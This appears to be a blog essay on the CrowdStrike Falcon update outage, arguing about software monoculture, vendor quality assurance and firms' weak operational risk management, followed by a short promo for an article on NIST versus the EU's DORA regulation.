The monoculture issue is a known one, and has been a known problem with various types of software. For example, since Microsoft Windows established dominance across the global desktop and much of the server market, cyberattacks that are often commoditized have caused significant and widespread problems¹.

To its credit, Microsoft has been a demonstrably “good citizen” since introducing Patch Tuesday in the early 2000s, and has become increasingly communicative about vulnerabilities and bug fixes, not to mention being an active and helpful part of the global anti-cybercrime ecosystem, which has significantly reduced the risk of another Code Red worm. That said, breaches of widely used software platforms such as SolarWinds, as well as critical vulnerabilities in omnipresent components such as Log4J, underscore that monocultures engender massive systemic vulnerability.

As much as I agree with Kim’s article, I believe that what we know so far (!) about the Crowdstrike issue merits a few additional discussions.

First, that of vendor software quality assurance. Now comes the hindsight armchair quarterbacking. Ready?

Here’s an analysis of what supposedly caused the bug in the Falcon update. Here’s another one casting doubt on that explanation (apologies for Twitter links), and speculating about a reason why Crowdstrike QA didn’t catch the problem. Here’s a post asking why kernel drivers are written in C/C++, which can have memory safety issues (but referencing the first post – I make no comment on the accuracy of any of these). Another comment (in my opinion rightfully) states that no EDR software should rely on kernel mode drivers. I’ve also read comments in numerous private groups I’m a member of claiming that Crowdstrike did not perform code fuzzing, at least not sufficiently, and that it bypassed Microsoft driver signing – admittedly not required by Microsoft outside of machines using secure boot.

Software will always have bugs and security vulnerabilities, which is one reason why the debate about vendor liability has been ongoing since at least the late 1990s. Crowdstrike is not the first major security vendor to cause outages with updates – among others, Kaspersky and McAfee in 2010 (bizarrely, when Crowdstrike’s current CEO was CTO at McAfee) have both caused problems with updates. Software vendor contracts are usually very clear about refusing any liability for potential bugs.

Like many other tech vendors, Crowdstrike laid off significant numbers of staff in 2023, including a lot of engineers, developers, and QA testers. On its own, this is already concerning. I’ve always supported stricter regulations regarding supply chain risk management and vendor responsibility for processes and adequate resource investment for risk mitigation.

Perfect testing and QA procedures with enough resources would not have guaranteed that a defective update didn’t go out. But a defective update did go out, and it did take out millions of important systems. Thus, something went very, very wrong. QED. No argument about technical, procedural, or legal finesses will change this.

Second is the equally important topic of operational risk management. Without victim blaming, this is partially the fault of Crowdstrike users, and strongly related to the software monoculture issue. Just as it’s impossible to guarantee security of a system, it’s also very difficult to retain a complete overview of all IT assets, versions, dependencies, etc. in complex environments.

Nonetheless, the sheer level of chaos introduced across multiple industries by a single component failing, and the difficulty in recovering from it (many systems are still offline and expected to remain so for some time) points to a systemic failure of operational risk awareness and incident response playbooks at firms affected by the bug.

Regulations such as the EU’s NIS2 Directive, and good practice standards, have focused primarily on third party information security risk management. More advanced organizations have successfully quantified infosec risk and mapped it to other, more fundamental risk management metrics. The CrowdStrike outage demonstrated conclusively that this is not the case for a lot of operational IT risk – basically, what are my dependencies, how bad would it be if one of them failed, and how can I mitigate or at least work around it?

Even if you can’t guard against a buggy update of a vital system component, you should at least know what those components are, how valuable they are, and how to work around their failure. A colleague recounted an example of a client that, having been burned by two recent breaches, had implemented backup processes using pen and paper to ensure continuity of operations in case of a major IT outage. This was neither optimal nor efficient, but it worked.

I’m a pessimist, and I like placing blame for failures on leadership when there’s even a hint that negligence or underinvestment in the pursuit of higher profits were weighty contributing factors to a crisis. That’s part of why CEOs are paid a lot of money. While the sheer size of the problem screams that someone screwed up, there’s always the possibility that this was not the case. Nonetheless, I firmly believe that the coming months will see a torrent of lawsuits, legislative investigations, and stricter regulations around all of the above issues – software monoculture, resilience testing and QA, and operational risk management. I am convinced that these will cause major problems not only for CrowdStrike, but also for many of its clients in critical sectors whose readiness was found to be lacking.

The worst case scenario is that C-levels will draw the wrong conclusions and somehow blame their information security teams. This was not a security issue.

  1. There’s an argument to be made here about the prevalence of Linux, and how it runs a sizeable portion of critical infrastructure. The breadth of Linux flavors and vendors, as well as its use for a lot of the world’s most important IT systems that are frequently hidden deep in the backend from not only “average users” but even a lot of C*Os, means that it’s almost impossible to get good statistics on Linux usage outside of when it’s used for web servers, or in mostly public-sector large desktop deployments. This diversity, on top of Linux’s strong security-conscious architecture, and the greater exposure of open source software to scrutiny by bug hunters, makes it far more resilient and resistant to major security threats. Most of the time. ↩︎

🔍 Exploring the Nexus: NIST Framework vs. DORA Regulation in the Financial Sector 🌐💼

CyAN member Gilles Chevillon shares an analysis of the Digital Operational Resilience Act, the European Union’s flagship regulation governing cybersecurity in the financial sector.